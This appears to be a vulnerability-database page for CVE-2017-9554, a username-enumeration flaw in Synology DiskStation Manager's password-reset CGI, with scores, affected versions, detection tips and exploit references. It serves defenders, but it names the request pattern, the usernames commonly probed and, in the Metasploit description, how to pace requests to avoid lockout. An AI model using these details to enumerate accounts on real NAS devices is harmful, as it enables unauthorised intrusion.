CVE-2017-9554
published 2017-07-24CVE-2017-9554: An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid…
PriorityP182medium5.3CVSS 3.0
AVNACLPRNUINSUCLINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
75.02%
99.4th percentile
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synology | diskstation_manager | <= 6.1.1-15101-4 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect repeated GET requests to /webman/forget_passwd.cgi with varying 'user=' parameter values — this is the enumeration attack vector for CVE-2017-9554. ↗
- →The Synology NAS responds differently depending on whether a username exists or not — differential response analysis on forget_passwd.cgi requests can confirm exploitation attempts. ↗
- →These enumeration requests count as login attempts; monitor for rapid sequential requests to forget_passwd.cgi which may trigger the lockout threshold (default: 10 logins in 5 minutes = permanent block). ↗
- →Known target usernames probed during exploitation include: admin, administrator, root, nobody, ftp — monitor for enumeration of these accounts via forget_passwd.cgi. ↗
- ·Affected versions span multiple DSM branches — ensure detection/patching covers all three vulnerable release lines. ↗
CVSS provenance
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-999r-3mg2-g4rj: An information exposure vulnerability in forget_passwd
ghsa_unreviewed·2022-05-14
CVE-2017-9554 [MEDIUM] CWE-200 GHSA-999r-3mg2-g4rj: An information exposure vulnerability in forget_passwd
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
VulnCheck
synology diskstation_manager Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2017·CVSS 5.3
CVE-2017-9554 [MEDIUM] synology diskstation_manager Exposure of Sensitive Information to an Unauthorized Actor
synology diskstation_manager Exposure of Sensitive Information to an Unauthorized Actor
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
Affected: synology diskstation_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-iot-botnet-attack/
Exploit PoC: https://vulncheck.com/xdb/13f21c95757b; https://vulncheck.com/xdb/ca7998802530
No detection rules found.
Exploit-DB
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
exploitdb·2018-01-08·CVSS 5.3
CVE-2017-9554 [MEDIUM] Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
---
# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
# Date: 01/05/2018
# Exploit Author: Steve Kaun
# Vendor Homepage: https://www.synology.com
# Version: Before 6.1.3-15152
# CVE : CVE-2017-9554
Previously this was identified by the developer and the disclosure states "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi
Haven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another.
"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames
Metasploit
Synology Forget Password User Enumeration Scanner
metasploit
Synology Forget Password User Enumeration Scanner
Synology Forget Password User Enumeration Scanner
This module attempts to enumerate users on the Synology NAS by sending GET requests for the forgot password URL. The Synology NAS will respond differently if a user is present or not. These count as login attempts, and the default is 10 logins in 5min to get a permanent block. Set delay accordingly to avoid this, as default is permanent. Vulnerable DSMs are: DSM 6.1 < 6.1.3-15152 DSM 6.0 < 6.0.3-8754-4 DSM 5.2 < 5.2-5967-04
No writeups or analysis indexed.
2017-07-24
Published
Exploited in the wild